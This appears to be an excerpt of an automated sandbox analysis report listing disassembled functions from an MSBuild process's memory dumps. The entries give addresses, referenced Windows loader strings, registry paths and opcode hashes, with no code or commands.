                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0143C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • @, xrefs: 0143C1F1
                                                                                                                                                                                                                                                                  • PreferredUILanguages, xrefs: 0143C212
                                                                                                                                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0143C1C5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                                                                                                  • API String ID: 0-2968386058
                                                                                                                                                                                                                                                                  • Opcode ID: a11b04f31aa00a68f79d7cf432e57c884f74429607a736a28f3666b8a6b7a7b0
                                                                                                                                                                                                                                                                  • Instruction ID: 266aaee3d63ca592c5bd026c65da741c28d3608a6f83192be40aaf042616ff21
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a11b04f31aa00a68f79d7cf432e57c884f74429607a736a28f3666b8a6b7a7b0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82416372E00219EBDF11DBD8C881FEFBBB8AB58704F14406BEA09B7250D7749A458B90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01414144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                                                                                                  • API String ID: 0-1373925480
                                                                                                                                                                                                                                                                  • Opcode ID: 71c0238c0ce79797044b2499db89f573f2ddd46fd584c61def4c00a3294db561
                                                                                                                                                                                                                                                                  • Instruction ID: 6e89c45c06cfd914f3631c8422249b1706bbf52a2ec352733594d8df26733bd2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71c0238c0ce79797044b2499db89f573f2ddd46fd584c61def4c00a3294db561
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E412871A04258CBEB22DBE9C844BEDBBB4FF55344F28045BD901EB7A5D7348941CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013B33A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Actx , xrefs: 013B33AC
                                                                                                                                                                                                                                                                  • SXS: %s() passed the empty activation context data, xrefs: 013F29FE
                                                                                                                                                                                                                                                                  • RtlCreateActivationContext, xrefs: 013F29F9
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                                                                                                                                                                  • API String ID: 0-859632880
                                                                                                                                                                                                                                                                  • Opcode ID: 7d304235aae68c6c40ffe483442e69d893a17bf355f1347e49477df506272b8f
                                                                                                                                                                                                                                                                  • Instruction ID: 92d9731f8bfb98251936799301eeba18f8dd41fa0223fcb871afebfcf1973865
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d304235aae68c6c40ffe483442e69d893a17bf355f1347e49477df506272b8f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82313332600215DFEF22CE5CC8C0B977BA8BB44718F058469EF04AF681DB38E855CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0140B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0140B632
                                                                                                                                                                                                                                                                  • @, xrefs: 0140B670
                                                                                                                                                                                                                                                                  • GlobalFlag, xrefs: 0140B68F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                                                                                                                                  • API String ID: 0-4192008846
                                                                                                                                                                                                                                                                  • Opcode ID: f6dc1e742e6eadeab0e01f145e2b9783c60055e578c408a88cfbe6b2181ae32e
                                                                                                                                                                                                                                                                  • Instruction ID: 1408391caa05a220b0f7b85302c78ddbdb52d0ec6ff4d7729625c9d265a56680
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6dc1e742e6eadeab0e01f145e2b9783c60055e578c408a88cfbe6b2181ae32e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4315EB5D00209AFDB11EFA9CC80AEFBB7CEF44748F14446AE605A7290D7749E00CBA4
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C1270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • BuildLabEx, xrefs: 013C130F
                                                                                                                                                                                                                                                                  • @, xrefs: 013C12A5
                                                                                                                                                                                                                                                                  • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 013C127B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                                                                  • API String ID: 0-3051831665
                                                                                                                                                                                                                                                                  • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                                                                                                                                                                  • Instruction ID: 4938b327e0142164cc75ef248feaf80cf67cfe71679ba151a333dff506f9df4e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2317E72A00519EFDF12AB99CD44FDEBBBDEB94B58F004429EA14A7260D730DE059B60
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014020DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 014020F3
                                                                                                                                                                                                                                                                  • LdrpInitializationFailure, xrefs: 014020FA
                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01402104
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                  • API String ID: 0-2986994758
                                                                                                                                                                                                                                                                  • Opcode ID: 2346a3aa422a85763f9ab0322b481bf3256e45e06cfef06ee823f2ae967fb8c7
                                                                                                                                                                                                                                                                  • Instruction ID: ffef62759e02a03104b9eca025a590836740a9fb110a39823bca8ba7204ffc4f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2346a3aa422a85763f9ab0322b481bf3256e45e06cfef06ee823f2ae967fb8c7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EF0C275640308ABE725EA4ECC46F9A7B6CEB80F58F51406AFA407B3D5D2F0A904DA91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013903E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                                                                                                  • String ID: #%u
                                                                                                                                                                                                                                                                  • API String ID: 48624451-232158463
                                                                                                                                                                                                                                                                  • Opcode ID: be877828dd4e81047e2258006bcc2de711b849cca9aebbf2c764a13ee20464a8
                                                                                                                                                                                                                                                                  • Instruction ID: 52ed558550b549539bd9e544e678ec332b36ec811eb85f5e443a4512d6024f6c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be877828dd4e81047e2258006bcc2de711b849cca9aebbf2c764a13ee20464a8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8716F71A0025A9FDF05DFA9C994BAEB7F8FF18708F144065E905E7291EA34ED01CB60
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013952A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: @$@
                                                                                                                                                                                                                                                                  • API String ID: 0-149943524
                                                                                                                                                                                                                                                                  • Opcode ID: da7d16c4c65c17ef3891abf52d494370c2c9d98fc9690385dc557ea2981a62e1
                                                                                                                                                                                                                                                                  • Instruction ID: 4c804701ed35586bd7884cfe3a051fc15f96254406578e9264237d3a4a38f0f5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da7d16c4c65c17ef3891abf52d494370c2c9d98fc9690385dc557ea2981a62e1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5832BDB16083218BDB26CF19C48477EBBE5EF94758F14491EFA859B290E734D980CB92
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0144A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: `$`
                                                                                                                                                                                                                                                                  • API String ID: 0-197956300
                                                                                                                                                                                                                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                                                                                                  • Instruction ID: 220549b96e89801c7bd3cd3f78867ec2f7d25ef571ee66d98ba36b5363469a96
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43C1E5312443429BFB24CF29C841B6BBBE5AFD4318F244A2EF696CB2A1D774D505CB81
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01380CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • ResIdCount less than 2., xrefs: 013DEEC9
                                                                                                                                                                                                                                                                  • Failed to retrieve service checksum., xrefs: 013DEE56
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                                                                                                                                                                                                  • API String ID: 0-863616075
                                                                                                                                                                                                                                                                  • Opcode ID: c1f4e6ee75d3424defddeba3d0b8d418a7571f54ad00b94b3d36183048d27ff7
                                                                                                                                                                                                                                                                  • Instruction ID: a58b3ade6c53afd424b06a2393bc653c8ab4ea2692c8f0633b41284ffb79029a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1f4e6ee75d3424defddeba3d0b8d418a7571f54ad00b94b3d36183048d27ff7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90E1E2B19087449FE325CF19D480BABFBE4BB88718F40892EE5999B390D7709909CF56
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0138A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 0138A2FB
                                                                                                                                                                                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 0138A309
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                                                                                                  • API String ID: 0-2876891731
                                                                                                                                                                                                                                                                  • Opcode ID: d089135e752b4ecff8ec6efd681a31af6f66a102ecbb4688d4cc40072e2ebd6e
                                                                                                                                                                                                                                                                  • Instruction ID: 5a7b795a088913ed136a910a53f1b2ee02b04d4061324d6d0492913b300920b0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d089135e752b4ecff8ec6efd681a31af6f66a102ecbb4688d4cc40072e2ebd6e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7741AF71A0475ADBDB26DF69C444B6E7BF8FF84708F2440AAE904DB2A1E3B5D900CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014135BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                                                                                                                                  • API String ID: 0-118005554
                                                                                                                                                                                                                                                                  • Opcode ID: 91d7759888cf7ec1394b3b9dac81db51849699620170366a5687eee667882040
                                                                                                                                                                                                                                                                  • Instruction ID: 0ebd3097e782fd31b3a18501744dafb44e3bc93218b9a5b7a329b7d8cc8684aa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91d7759888cf7ec1394b3b9dac81db51849699620170366a5687eee667882040
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F3192712087429BE321DF69D854B1AB7E4FF95728F04086AF958CB3A4E734D905CB92
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013B329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: .Local\$@
                                                                                                                                                                                                                                                                  • API String ID: 0-380025441
                                                                                                                                                                                                                                                                  • Opcode ID: cc098490b72834d968d40a360fda1782f9db57c557f3c9fb61e3f38a7747bcb7
                                                                                                                                                                                                                                                                  • Instruction ID: c68c9153b4c4ff6f13703a16a4a892af4f5eebb87266a23970af59e1941099e3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc098490b72834d968d40a360fda1782f9db57c557f3c9fb61e3f38a7747bcb7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82318FB25097159FD711DF28C8C0A9BBBE8FB84658F44092EFA9983610EA30DD048B92
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013BA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-4008356553
                                                                                                                                                                                                                                                                  • Opcode ID: 19345a8541d8c48426a29c655d8d09cd3bf0407d8ebd8d70aea474df10457899
                                                                                                                                                                                                                                                                  • Instruction ID: 062eee3f99bc232809ba8fd1f996f4dbcce73ad7354153d31f80127a4877a443
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19345a8541d8c48426a29c655d8d09cd3bf0407d8ebd8d70aea474df10457899
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E101D1B2250B04AFE311DF18CD85F567BE8E794B29F018939AA58C7590E734E904CB46
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0138C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: MUI
                                                                                                                                                                                                                                                                  • API String ID: 0-1339004836
                                                                                                                                                                                                                                                                  • Opcode ID: 0ec33f9eca4629beab8047d3d0819198174ea012d24b5ffccb103d73cf1055fd
                                                                                                                                                                                                                                                                  • Instruction ID: 12c5a7c6e36976f0af2839baef48720f3e07528cfb77a1043510ba8eb3645993
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ec33f9eca4629beab8047d3d0819198174ea012d24b5ffccb103d73cf1055fd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36825C75E003198FEB25EFADC880BEDBBB5BF44318F148169E919AB291DB309D45CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013D2F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: P`vRbv
                                                                                                                                                                                                                                                                  • API String ID: 0-2392986850
                                                                                                                                                                                                                                                                  • Opcode ID: fded2a816b98328faa947521462738bbd63315ed818d90c0e40e717f072ba543
                                                                                                                                                                                                                                                                  • Instruction ID: bf3cee2cf13e82a4aee4ab3a1ae671f9fc23c19de71026b43dd2a8635557e8f3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fded2a816b98328faa947521462738bbd63315ed818d90c0e40e717f072ba543
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E42E4F7D0425AAAEF29DF6CF8446BDBBB5FF04318F58801AE541A7290D6348E41C752
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01387370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9939eddc363a32ca0e47cefea8ebd88497b97f7ccb75ce73819cdf1462a36258
                                                                                                                                                                                                                                                                  • Instruction ID: 44ba2e59b58bc1b4db07403ed1c2031ef0afd110d3c5e2c6a34748f740eb72bb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9939eddc363a32ca0e47cefea8ebd88497b97f7ccb75ce73819cdf1462a36258
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AA17C71608746CFC721EF2CC480A2ABBE6FF98718F25492EE58597351E730E945CB92
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013A2E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: a1e07d35b99e3b03d8f79dee61205c405c1b6cf89e99d089bab43c1b6704a931
                                                                                                                                                                                                                                                                  • Instruction ID: 2522ae4cf1af2bf03fe0971c0e8df55b8b7320e59e2a64af403ec66b531f8de2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1e07d35b99e3b03d8f79dee61205c405c1b6cf89e99d089bab43c1b6704a931
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8BF1A471608746CFD726CF28C484B6ABBE5FF88718F84482DE98987781DB34E949CB51
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 00409E50 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: (
                                                                                                                                                                                                                                                                  • API String ID: 0-3887548279
